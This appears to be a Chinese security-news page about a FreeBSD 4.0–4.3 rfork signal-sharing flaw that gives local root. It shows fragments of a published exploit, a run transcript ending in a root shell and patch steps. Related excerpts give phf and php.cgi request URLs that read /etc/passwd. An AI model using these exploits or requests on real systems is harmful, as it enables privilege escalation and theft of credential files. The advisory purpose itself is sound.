发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。问题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。
利用此漏洞,本地攻击者能取得 root 权限。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
-------------vvfreebsd.c----------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............
受影响版本:
FreeBSD 4.3 4.2 4.1 4.0
早期版本也许受影响
解决方案:
尚无
****** 2001-07-14 add by NetDemon(netdemon@20cn.net) ******
测试程序使用方法:
netdemon%gcc -o vvbsd vvbsd.c
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
FreeBSD以此作出补丁
方法:
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc
# cd /usr/src/sys/kern
# patch -p < /path/to/patch
本地攻击者利用FreeBSD4.3设计漏洞取得系统特权_网络冲浪
时间: 2024-11-05 19:33:14
本地攻击者利用FreeBSD4.3设计漏洞取得系统特权_网络冲浪的相关文章
网络漏洞扫描系统必要性_网络冲浪
随着计算机技术.网络技术的飞速发展和普及应用,网络安全已日渐成为人们关注的焦点问题之一.近几年来,安全技术和安全产品已经有了长足的进步,部分技术与产品已日趋成熟.但是,单个安全技术或者安全产品的功能和性能都有其局限性,只能满足系统与网络特定的安全需求.因此,如何有效利用现有的安全技术和安全产品来保障系统与网络的安全已成为当前信息安全领域的研究热点之一. 首先,让我们来看看现阶段网络上使用最多的安全设备防火墙和入侵检测.为了确保网络的安全使用,研究它们的局限性和脆弱性已经十分必要. 一.防火墙的局
AceDeceiver成为首个可利用苹果 DRM设计漏洞感染iOS设备的木马程序
本文讲的是 AceDeceiver成为首个可利用苹果 DRM设计漏洞感染iOS设备的木马程序,近日,我们发现了一个全新系列的iOS恶意软件,能够成功感染非越狱设备,我们将其命名为"AceDeceiver". 与过去两年某些iOS恶意软件利用企业证书发动攻击不同,AceDeceiver则无需企业证书即可自行安装.其原因是,AceDeceiver利用了Apple DRM机制上的设计漏洞,即使其已被苹果从App Store内移除,也可以借助其他全新攻击途径进行传播. AceDeceiver是
黑客利用RM在IE上强行打开本地文件_网络冲浪
星期三,安全公司Secunia披露,在Real Player和IE中新发现了一个安全漏洞,黑客可以借用RealMedia (.rm)文件在安装有RealPlayer的浏览器上打开本地文件. 这个漏洞存在于版本号为10.5 (build 6.0.12.1056)的RealPlayer,它含有Plus和Basic版本,适用于Windows, Mac OS X, Linux, Unix, Palm OS以及Symbian OS上.然而,过往版本也不排除受其感染的可能性. Secunia指出,恶意用户可
计算机网络系统安全漏洞分类研究_网络冲浪
写本文的目地是为了总结一些东西,解决在试图构造一个漏洞数据库的过程中碰到的主要问题,也就是如何对计算机网络漏洞进行分类的问题.文中的一些想法并不成熟,有些甚至连自己也不满意,权作抛砖引玉,以期与在这方面有深入研究的同仁交流,共同提高完善.一个计算机网络安全漏洞有它多方面的属性,我认为主要可以用以下几个方面来概括:漏洞可能造成的直接威胁,漏洞的成因,漏洞的严重性,漏洞被利用的方式.以下的讨论将回绕这几个方面对漏洞细分其类.A.按漏洞可能对系统造成的直接威胁 可以大致分成以下几类,事实上一个系统漏洞
惊!QQ新漏洞 腾讯3亿用户遭受威胁 附说明_网络冲浪
根据易观国际发布<2007年第2季度中国即时通讯市场季度监测>报告显示,中国活跃的IM软件账号已经 达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者.可是你知道吗,你的QQ现在很危险了! 不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ.想知道他们是怎么做的以及该如何避免自己的QQ 被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞). 月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的"QQ场景漏洞".他们惊奇的发现,不需
利用IP地址欺骗突破防火墙_网络冲浪
一般的访问控制主要在防火墙中进行设置,制定一些安全策略:如内部局域网的资源不允许外部网上的用户使用:不设防区(又称非军事区)可以为内部或外部局域网,其中的资源允许外部网的用户有限度地使用:可以使外部用户访问非军事区(DMZ区)的WEB服务器等等. 深入分析研究防火墙技术,利用防火墙配置和实现的漏洞,可以对它实施攻击.通常情况下,有效的攻击都是从相关的子网进行的,因为这些网址得到了防火墙的信赖,虽说成功与否尚取决于机遇等其他因素,但对攻击者而言很值得一试. 突破防火墙系统最常用的方法是IP地址欺骗
CGI漏洞集锦_网络冲浪
一.phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd但是我们还能找到它吗?二.php.cgi 2.0beta10或更早版本的漏洞 可以读nobody权限的所有文件.lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwdphp.cgi
如何利用网桥功能实现有线上网_网络冲浪
在网上看到一篇利用Windows XP网桥功能实现无线上网的文章,个人观点认为,无线上网固然有其独特的优点,但就现阶段的状态来看,有线网络还是在传输速度.传输质量以及价格方面有着无线网络无法比拟的优势,因而在此介绍网桥功能实现有线上网,希望能够与大家一起交流心得. 在这里我们以多台计算机共用一条ADSL上网为例,介绍整个的连接过程,当然基于无线连接.拨号的连接也能够实现,但在这里就有线上网的具体配置实现过程进行说明. 如图1所示是实现多台计算机同时上网的网络结构,这个结构和Wingate等软件上
BBS3000漏洞_网络冲浪
****基本漏洞测试***** YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛, 但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上 这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭 示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐 蔽和服务器的安全. 测试版本:bbs3000 v4.11 系统平台:win2k adv server=sp3 + iis 5.0 +ActivePerl 5.6.1.626